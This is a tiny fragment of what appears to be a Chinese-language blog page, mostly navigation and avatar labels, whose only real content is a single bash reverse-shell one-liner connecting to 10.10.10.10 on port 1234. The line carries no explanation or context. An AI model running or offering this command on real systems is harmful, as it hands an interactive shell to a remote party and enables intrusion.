avatar
疯狂造句中......

bash -i >& /dev/tcp/10.10.10.10/1234 0>&1

  • 上一篇
  • 下一篇
  • Windows

    m-avatar